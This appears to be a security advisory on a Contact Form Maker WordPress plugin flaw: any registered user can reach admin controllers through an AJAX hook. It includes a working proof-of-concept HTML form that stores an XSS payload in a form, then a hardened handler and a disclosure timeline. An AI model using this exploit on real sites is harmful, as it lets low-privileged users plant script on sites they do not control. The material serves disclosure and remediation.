form_maker_cfm() is reachable by every registered user (an account created via wp-login.php?action=register is enough), because it is hooked with add_action('wp_ajax_get_stats_fmc', 'form_maker_cfm') and wp_ajax_ actions run for any logged-in user.
Through this function we can include and run the /admin/controllers/FMControllerManagefmc.php class, which is responsible for plugin management.
We can edit any form of the plugin and add XSS to it via wp-admin/admin-ajax.php, because the output is not escaped properly.
File: contact-form-maker\contact-form-maker.php
function form_maker_cfm() {
  require_once(WD_FMC_DIR . '/framework/WDW_FMC_Library.php');
  $page = WDW_FMC_Library::get('page');
  if (($page != '') && (($page == 'manage_fmc') || ($page == 'submissions_fmc') || ($page == 'blocked_ips_fmc') || ($page == 'themes_fmc') || ($page == 'licensing_fmc') || ($page == 'featured_plugins_fmc') || ($page == 'uninstall_fmc') || ($page == 'formcontactwindow'))) {
    require_once(WD_FMC_DIR . '/admin/controllers/FMController' . ucfirst(strtolower($page)) . '.php');
    $controller_class = 'FMController' . ucfirst(strtolower($page));
    $controller = new $controller_class();
    $controller->execute();
  }
}
Proof of Concept
Log in as a standard user.
The following form edits the form with ID=1 and adds a simple XSS payload to it:
<form method="post" action="http://wordpress-instalation/wp-admin/admin-ajax.php?action=get_stats_fmc&page=manage_fmc&task=save&current_id=1">
<input type="text" name="form_front" value="<script>alert('XSS');</script>">
<input type="submit" value="Hack!">
</form>
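For comparison, here is a hardened version of the handler above, written as an added example for this advisory and not taken from the plugin: it keeps the same controller dispatch but adds the capability check, nonce check and parameter whitelist that the original lacks, and shows output escaping for a stored field such as form_front. The nonce action name 'fmc_manage' and the helper fmc_render_form_front() are assumptions, not plugin identifiers.

```php
<?php
// Added example: hardened variant of form_maker_cfm() (not the plugin's code).
add_action('wp_ajax_get_stats_fmc', 'form_maker_cfm_hardened');

function form_maker_cfm_hardened() {
    // 1. Capability check: management controllers are admin functionality.
    //    wp_ajax_ hooks fire for any logged-in user, so without this line a
    //    subscriber-level account reaches the same code path.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    // 2. Nonce check: the request must come from the plugin's own admin page,
    //    not from an attacker-hosted form (CSRF). 'fmc_manage' is an assumed
    //    nonce action name; the real one must match the page that issues it.
    check_ajax_referer('fmc_manage', 'nonce');

    // 3. Whitelist lookup instead of the long string comparison. The set is
    //    the same as in the original handler.
    $allowed = array('manage_fmc', 'submissions_fmc', 'blocked_ips_fmc',
                     'themes_fmc', 'licensing_fmc', 'featured_plugins_fmc',
                     'uninstall_fmc', 'formcontactwindow');
    // sanitize_key() lowercases and strips anything outside [a-z0-9_-],
    // so no path characters can reach the require_once below.
    $page = isset($_REQUEST['page']) ? sanitize_key($_REQUEST['page']) : '';
    if (!in_array($page, $allowed, true)) {
        wp_send_json_error('unknown page', 400);
    }

    require_once(WD_FMC_DIR . '/admin/controllers/FMController' . ucfirst($page) . '.php');
    $controller_class = 'FMController' . ucfirst($page);
    $controller = new $controller_class();
    $controller->execute();
    wp_die(); // end the AJAX response cleanly
}

// 4. Output escaping (assumed helper): a stored field like form_front must be
//    escaped for the context it is rendered into. Here it is HTML body text,
//    so esc_html() turns <script> into &lt;script&gt; and the payload is inert.
function fmc_render_form_front($form_front) {
    return '<div class="fmc-front">' . esc_html($form_front) . '</div>';
}
```

Escaping belongs at the point of output, not only at save time, so a value that bypassed input filtering is still rendered harmlessly.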
Timeline
- 14-10-2014: Discovered
- 07-11-2014: Vendor notified
- 08-11-2014: Version 1.7.19 released, issue resolved